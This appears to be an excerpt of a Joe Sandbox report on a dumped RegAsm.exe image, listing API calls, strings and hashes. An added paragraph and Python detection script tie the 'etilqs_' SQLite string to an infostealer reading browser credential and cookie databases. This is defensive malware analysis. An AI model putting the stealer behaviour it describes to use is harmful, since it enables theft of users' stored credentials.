                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                  • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                  • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                  • memcmp.MSVCRT ref: 004092D9
                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                  • memcmp.MSVCRT ref: 0040933B
                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                  • memcmp.MSVCRT ref: 00409411
                                                                                                                                  • memcmp.MSVCRT ref: 00409429
                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                  • memcmp.MSVCRT ref: 004094AC
                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                  • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                  • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4019544885-1856150674
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
APIs
Strings
• <%s>, xrefs: 004100A6
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <?xml version="1.0" ?>, xrefs: 0041007C
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
                                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                  • String ID: %2.2X
                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                  • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                  • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
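The "%s\etilqs_" format string built under GetTempPathW in the function above is SQLite's Windows temp-file prefix (SQLITE_TEMP_FILE_PREFIX in os_win.c, followed by random alphanumerics), so the RegAsm.exe image dumped here carries a statically linked SQLite engine, which is what a stealer needs to query browser credential and cookie databases. The following is an added example, not code from the report or from Joe Sandbox: it runs a simple detection over constructed FileCreate telemetry rows and flags etilqs_ files created by processes that are not expected to embed SQLite. The allowlist and the sample events are assumptions for illustration.

```python
import ntpath
import re

# SQLite (os_win.c) names its scratch files SQLITE_TEMP_FILE_PREFIX
# ("etilqs_") followed by random alphanumerics; this is the name the
# "%s\etilqs_" format string above assembles under GetTempPathW.
ETILQS_RE = re.compile(r"^etilqs_[A-Za-z0-9]+$")

# Assumption: processes expected to embed SQLite on this host. A real
# allowlist is site-specific and longer (Electron apps, mail clients, ...).
SQLITE_ALLOWLIST = {"chrome.exe", "firefox.exe", "msedge.exe"}

# Constructed sample events, not taken from the report. Each row is
# (creating process image, created file path), as a FileCreate event
# (e.g. Sysmon Event ID 11) would record it.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\etilqs_AbCdEf123456789"),
    ("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\etilqs_9f3kd02ls0a1XYZ"),
    ("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\install.log"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "C:\\Users\\user\\AppData\\Local\\Temp\\etilqs_Qq1Ww2Ee3Rr4Tt5"),
]


def is_sqlite_temp_file(path):
    """True if the file name matches SQLite's Windows temp-file pattern.

    ntpath is used so Windows-style paths parse correctly on any host.
    """
    return ETILQS_RE.match(ntpath.basename(path)) is not None


def flag_unexpected_sqlite_users(events, allowlist=SQLITE_ALLOWLIST):
    """Return (image, path) pairs where a process outside the allowlist
    created an etilqs_ file: evidence of an embedded SQLite engine in a
    host that should not have one, such as a .NET utility that has been
    hollowed and now runs an infostealer.
    """
    hits = []
    for image, path in events:
        if not is_sqlite_temp_file(path):
            continue
        if ntpath.basename(image).lower() in allowlist:
            continue
        hits.append((image, path))
    return hits


if __name__ == "__main__":
    for image, path in flag_unexpected_sqlite_users(SAMPLE_EVENTS):
        print(f"unexpected SQLite temp file: {image} -> {path}")
```

Two caveats for anyone turning this into a rule: SQLite only writes etilqs_ files when a statement needs spill storage (temporary b-trees for sorting, statement journals, TEMP tables), so a process can query a copied Login Data or Cookies database without ever creating one, and absence of the file clears nothing; conversely many legitimate applications bundle SQLite, so the allowlist, not the file name, carries the signal. The "%s\etilqs_" and "etilqs_" strings in a dumped image, as reported above, are the more reliable indicator that the engine is present.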
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                  • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                  • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                  • String ID: </%s>
                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                  APIs
                                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
